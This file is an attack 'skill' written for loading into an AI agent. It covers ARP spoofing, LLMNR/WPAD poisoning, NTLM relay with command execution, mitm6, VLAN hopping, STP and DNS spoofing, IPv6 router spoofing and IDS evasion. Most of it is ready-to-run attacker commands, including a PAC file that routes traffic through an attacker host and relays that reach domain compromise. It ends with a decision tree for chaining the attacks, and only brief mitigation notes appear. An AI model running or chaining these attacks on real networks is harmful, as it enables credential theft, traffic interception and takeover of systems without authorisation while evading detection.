| name | network-protocol-attacks |
| description | Network protocol attack playbook. Use when exploiting layer 2/3 protocols including ARP spoofing, LLMNR/NBT-NS/mDNS poisoning, WPAD abuse, DHCPv6 attacks, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. |
SKILL: Network Protocol Attacks — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert network protocol attack techniques. Covers ARP spoofing, name resolution poisoning (LLMNR/NBT-NS/mDNS), WPAD abuse, DHCPv6 takeover, VLAN hopping, STP manipulation, DNS spoofing, IPv6 attacks, and IDS/IPS evasion. Base models miss the chaining opportunities between these attacks and the nuances of modern switched network exploitation.
0. RELATED ROUTING
Before going deep, consider loading:
Advanced Reference
Also load NAME_RESOLUTION_POISONING.md when you need:
- Detailed Responder/mitm6 configuration and workflows
- NTLM relay target selection and chaining
- Credential format analysis and cracking priorities
1. ARP SPOOFING
Gratuitous ARP — MitM Positioning
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP &
arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP &
ettercap -T -q -i eth0 -M arp:remote /VICTIM_IP// /GATEWAY_IP//
bettercap -iface eth0
> set arp.spoof.targets VICTIM_IP
> arp.spoof on
> net.sniff on
Selective Targeting
> set arp.spoof.targets 10.0.0.50,10.0.0.51
> set arp.spoof.fullduplex true
> set arp.spoof.internal true
> arp.spoof on
Detection Indicators
- Duplicate MAC addresses in ARP table
- Gratuitous ARP storms from non-gateway IPs
- Tools:
arpwatch, static ARP entries, 802.1X port authentication
2. LLMNR / NBT-NS / mDNS POISONING
Responder — Credential Capture
responder -I eth0 -dwPv
responder -I eth0 -A
Captured Hash Formats
| Protocol | Hash Type | Hashcat Mode | Crackability |
|---|
| NTLMv1 | NetNTLMv1 | 5500 | Fast — rainbow tables viable |
| NTLMv2 | NetNTLMv2 | 5600 | Moderate — dictionary + rules |
| NTLMv1-ESS | NetNTLMv1 | 5500 | Fast — same as NTLMv1 |
hashcat -m 5600 hashes.txt wordlist.txt -r rules/best64.rule
john --format=netntlmv2 hashes.txt --wordlist=wordlist.txt
Relay Instead of Crack
ntlmrelayx.py -tf targets.txt -smb2support
ntlmrelayx.py -t ldaps://DC01 --delegate-access
ntlmrelayx.py -t mssql://DB01 -q "exec xp_cmdshell 'whoami'"
3. WPAD ABUSE
responder -I eth0 -wPv
Manual WPAD PAC File
function FindProxyForURL(url, host) {
return "PROXY ATTACKER_IP:3128; DIRECT";
}
4. DHCPv6 ATTACK — mitm6
Even on IPv4-only networks, Windows clients send DHCPv6 solicitations by default.
mitm6 -d domain.com
ntlmrelayx.py -6 -t ldaps://DC01 -wh fakewpad.domain.com -l loot --delegate-access
Key Conditions
- SMB signing disabled on targets (for SMB relay)
- LDAP signing not enforced on DC (for LDAP relay)
- Domain Computers quota > 0 (for machine account creation, default: 10)
5. VLAN HOPPING
Switch Spoofing (DTP)
yersinia dtp -attack 1 -interface eth0
./frogger.sh
modprobe 8021q
vconfig add eth0 TARGET_VLAN
ifconfig eth0.TARGET_VLAN 10.10.10.1 netmask 255.255.255.0 up
Double Tagging (802.1Q)
from scapy.all import *
pkt = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=100)/IP(dst="TARGET")/ICMP()
sendp(pkt, iface="eth0")
Mitigation
- Disable DTP:
switchport nonegotiate
- Set native VLAN to unused:
switchport trunk native vlan 999
- Prune VLANs: only allow needed VLANs on trunk ports
6. STP MANIPULATION
Root Bridge Claim
yersinia stp -attack 4 -interface eth0
Topology Change Attack
yersinia stp -attack 1 -interface eth0
Mitigation
- BPDU Guard on access ports
- Root Guard on designated ports
spanning-tree portfast bpduguard enable
7. DNS SPOOFING
DNS Cache Poisoning
bettercap -iface eth0
> set dns.spoof.domains target.com, *.target.com
> set dns.spoof.address ATTACKER_IP
> dns.spoof on
echo "target.com A ATTACKER_IP" >> /etc/ettercap/etter.dns
ettercap -T -q -i eth0 -P dns_spoof -M arp:remote /VICTIM// /GATEWAY//
Kaminsky Attack Variant
Flood recursive resolver with forged responses for random subdomains, each including a malicious authority section pointing the NS record to attacker-controlled server.
8. IPv6 ATTACKS
Router Advertisement Spoofing
atk6-fake_router6 eth0 ATTACKER_IPV6_PREFIX/64
atk6-parasite6 eth0
atk6-redir6 eth0 ...
SLAAC Abuse
9. IDS/IPS EVASION
| Technique | Method | Tool/Flag |
|---|
| IP Fragmentation | Split payload across fragments | nmap -f, fragroute |
| TTL Manipulation | Set TTL to expire at IDS but reach target | fragroute |
| Encoding Evasion | URL/Unicode/hex encoding | Manual, custom scripts |
| Session Splicing | Split TCP payload across segments | fragroute, nmap --data-length |
| Timing-Based | Slow scan to avoid rate-based detection | nmap -T0, nmap -T1 |
| Decoy Scanning | Mix real scan with decoy source IPs | nmap -D RND:10 |
| Idle/Zombie Scan | Use idle host as scan proxy | nmap -sI ZOMBIE_IP |
echo "ip_frag 8" > /tmp/frag.conf
echo "order random" >> /tmp/frag.conf
fragroute -f /tmp/frag.conf TARGET_IP
nmap -sS -f --mtu 24 --data-length 50 -D RND:5 -T2 TARGET
10. DECISION TREE
Network access obtained — want to escalate via network attacks
│
├── On same broadcast domain as targets?
│ ├── YES → ARP spoof for MitM (§1)
│ │ └── Capture plaintext creds or redirect traffic
│ └── NO → need VLAN hopping first (§5)
│ ├── DTP enabled? → switch spoofing
│ └── Know native VLAN? → double tagging
│
├── Windows environment?
│ ├── LLMNR/NBT-NS enabled? (default YES)
│ │ └── Run Responder (§2) → capture NetNTLM hashes
│ │ ├── NTLMv1? → crack fast or relay
│ │ └── NTLMv2? → relay (§2) or crack with rules
│ │
│ ├── WPAD configured or auto-detect? → WPAD abuse (§3)
│ │
│ └── IPv6 not hardened? (default) → mitm6 + ntlmrelayx (§4)
│ └── LDAP relay → RBCD → domain compromise
│
├── Need DNS control?
│ ├── MitM already established? → DNS spoofing (§7)
│ └── DHCPv6 available? → mitm6 for DNS takeover (§4)
│
├── Managed switches with weak config?
│ ├── BPDU Guard off? → STP root bridge claim (§6)
│ └── DTP enabled? → VLAN hopping (§5)
│
├── IPv6 attack surface?
│ └── RA spoofing / SLAAC abuse (§8) → MitM over IPv6
│
└── IDS/IPS in path?
└── Apply evasion techniques (§9) — fragmentation, timing, encoding